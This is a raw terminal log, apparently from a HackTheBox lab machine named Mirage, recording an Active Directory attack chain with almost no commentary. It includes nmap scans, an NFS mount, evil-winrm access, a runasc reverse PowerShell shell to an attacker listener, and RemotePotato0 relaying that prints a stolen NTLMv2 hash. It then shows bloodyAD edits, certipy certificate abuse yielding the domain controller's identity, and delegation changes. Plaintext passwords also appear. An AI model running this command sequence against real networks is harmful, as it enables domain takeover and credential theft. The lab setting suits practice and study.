| INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":736,"client_ip":"10.10.16.7","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}
| -ERR 'Authorization Violation'
| NULL:
| INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":733,"client_ip":"10.10.16.7","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}
|_ -ERR 'Authentication Timeout'
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
50586/tcp open msrpc Microsoft Windows RPC
56754/tcp open msrpc Microsoft Windows RPC
56768/tcp open msrpc Microsoft Windows RPC
64708/tcp open msrpc Microsoft Windows RPC
64717/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
64733/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4222-TCP:V=7.95%I=7%D=7/21%Time=687E29E8%P=x86_64-pc-linux-gnu%r(NU
SF:LL,1CF,"INFO\x20{\"server_id\":\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQII
SF:VNL5AYWADYM6357W5F\",\"server_name\":\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXE
SF:IMNQIIVNL5AYWADYM6357W5F\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_c
SF:ommit\":\"a82cfda\",\"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"por
SF:t\":4222,\"headers\":true,\"auth_required\":true,\"max_payload\":104857
SF:6,\"jetstream\":true,\"client_id\":733,\"client_ip\":\"10\.10\.16\.7\",
SF:\"xkey\":\"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV\"}\
SF:x20\r\n-ERR\x20'Authentication\x20Timeout'\r\n")%r(GenericLines,1D0,"IN
SF:FO\x20{\"server_id\":\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADY
SF:M6357W5F\",\"server_name\":\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5
SF:AYWADYM6357W5F\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_commit\":\"
SF:a82cfda\",\"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222,\
SF:"headers\":true,\"auth_required\":true,\"max_payload\":1048576,\"jetstr
SF:eam\":true,\"client_id\":734,\"client_ip\":\"10\.10\.16\.7\",\"xkey\":\
SF:"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV\"}\x20\r\n-ER
SF:R\x20'Authorization\x20Violation'\r\n")%r(GetRequest,1D0,"INFO\x20{\"se
SF:rver_id\":\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F\",
SF:\"server_name\":\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357
SF:W5F\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_commit\":\"a82cfda\",\
SF:"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222,\"headers\":
SF:true,\"auth_required\":true,\"max_payload\":1048576,\"jetstream\":true,
SF:\"client_id\":735,\"client_ip\":\"10\.10\.16\.7\",\"xkey\":\"XBZCN2J5PX
SF:XZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV\"}\x20\r\n-ERR\x20'Autho
SF:rization\x20Violation'\r\n")%r(HTTPOptions,1D0,"INFO\x20{\"server_id\":
SF:\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F\",\"server_n
SF:ame\":\"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F\",\"ve
SF:rsion\":\"2\.11\.3\",\"proto\":1,\"git_commit\":\"a82cfda\",\"go\":\"go
SF:1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222,\"headers\":true,\"aut
SF:h_required\":true,\"max_payload\":1048576,\"jetstream\":true,\"client_i
SF:d\":736,\"client_ip\":\"10\.10\.16\.7\",\"xkey\":\"XBZCN2J5PXXZKRARPYRM
SF:ZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV\"}\x20\r\n-ERR\x20'Authorization\x
SF:20Violation'\r\n");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-07-21T18:53:32
|_ start_date: N/A
|_clock-skew: 7h00m02s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 462.35 seconds
└─$ showmount -e 10.129.248.59
Export list for 10.129.248.59:
/MirageReports (everyone)
└─$ sudo mount -t nfs 10.129.248.59:/MirageReports /mnt/
└─$ sudo ls /mnt
Incident_Report_Missing_DNS_Record_nats-svc.pdf Mirage_Authentication_Hardening_Report.pdf
└─$ nc nat-svc.mirage.htb 4222
INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":832,"client_ip":"10.10.16.7","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}
-ERR 'Authentication Timeout'
┌──(anurag㉿anurag)-[~/htb/Mirage]
└─$ export KRB5_CONFIG=./krb5.conf
└─$ kinit NATHAN.AADAM@MIRAGE.HTB
Password for NATHAN.AADAM@MIRAGE.HTB:
└─$ evil-winrm -i dc01.mirage.htb -r mirage.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> dir C:\Users\nathan.aadam\Desktop\
Directory: C:\Users\nathan.aadam\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/4/2025 1:01 PM 2312 Microsoft Edge.lnk
-ar--- 7/20/2025 11:39 PM 34 user.txt
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>
*Evil-WinRM* PS C:\temp> .\runasc.exe nathan.aadam 3edc#EDC3 powershell -r 10.10.16.11:1234
[*] Warning: The logon for user 'nathan.aadam' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-1d94dd4$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2220 created in background.
┌──(anurag㉿anurag)-[~/htb/Mirage]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.11] from (UNKNOWN) [10.129.195.48] 56110
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
=================== ==============================================
mirage\nathan.aadam S-1-5-21-2127163471-3824721834-2568365109-1110
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MIRAGE\Exchange_Admins Group S-1-5-21-2127163471-3824721834-2568365109-2601 Mandatory group, Enabled by default, Enabled group
MIRAGE\IT_Admins Group S-1-5-21-2127163471-3824721834-2568365109-1106 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
PS C:\Windows\system32>
PS C:\Windows\system32> qwinsta
qwinsta
SESSIONNAME USERNAME ID STATE TYPE DEVICE
>services 0 Disc
console mark.bbond 1 Active
PS C:\Windows\system32>
#on our machine
└─$ socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.129.195.48:9999
#on box
PS C:\temp> .\RemotePotato0.exe -m 2 -s 1 -x 10.10.16.11
.\RemotePotato0.exe -m 2 -s 1 -x 10.10.16.11
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (null) to your victim machine on port 9999
[*] Example Network redirector:
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] IStoragetrigger written: 104 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!
NTLMv2 Client : DC01
NTLMv2 Username : MIRAGE\mark.bbond
NTLMv2 Hash : mark.bbond::MIRAGE:7013e4ac202a8922:26ca9686e9654d2f934fc9cfe36214ee:0101000000000000a11d07624bfbdb01f23c6dc1779606910000000002000c004d0049005200410047004500010008004400430030003100040014006d00690072006100670065002e0068007400620003001e0064006300300031002e006d00690072006100670065002e00680074006200050014006d00690072006100670065002e0068007400620007000800a11d07624bfbdb0106000400060000000800300030000000000000000100000000200000e217b7bc8776c4fa1a8b008d2ee9e05697e814c38c252fa149b54d0c553451b90a00100000000000000000000000000000000000090000000000000000000000
PS C:\temp>
└─$ bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'MARK.BBOND' -p '1day@atime' -k set object "javier.mmarshall" logonHours
[!] Attribute encoding not supported for logonHours with bytes attribute type, using raw mode
[+] javier.mmarshall's logonHours has been updated
┌──(anurag㉿anurag)-[~/htb/Mirage]
└─$ export KRB5_CONFIG=./krb5.conf
┌──(anurag㉿anurag)-[~/htb/Mirage]
└─$ kinit mark.bbond@MIRAGE.HTB
Password for mark.bbond@MIRAGE.HTB:
┌──(anurag㉿anurag)-[~/htb/Mirage]
└─$ klist
Ticket cache: FILE:MIRAGE-SERVICE$.ccache
Default principal: mark.bbond@MIRAGE.HTB
Valid starting Expires Service principal
07/25/25 02:05:17 07/25/25 12:05:17 krbtgt/MIRAGE.HTB@MIRAGE.HTB
renew until 07/26/25 02:05:10
└─$ certipy req -k -dc-ip '10.10.11.78' -target 'dc01.mirage.htb' -ca 'Mirage-DC01-CA' -template 'User'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 11
[*] Successfully requested certificate
[*] Got certificate with UPN 'dc01$@mirage.htb'
[*] Certificate object SID is 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Saving certificate and private key to 'dc01.pfx'
[*] Wrote certificate and private key to 'dc01.pfx'
└─$ certipy auth -pfx dc01.pfx -dc-ip 10.10.11.78 -ldap-shell
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'dc01$@mirage.htb'
[*] Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.10.11.78:636'
[*] Authenticated to '10.10.11.78' as: 'u:MIRAGE\\DC01$'
Type help for list of commands
# whoami
u:MIRAGE\DC01$
# set_rbcd dc01$ mirage-service$
Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000
Found Grantee DN: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1112
Delegation rights modified successfully!
mirage-service$ can now impersonate users on dc01$ via S4U2Proxy
#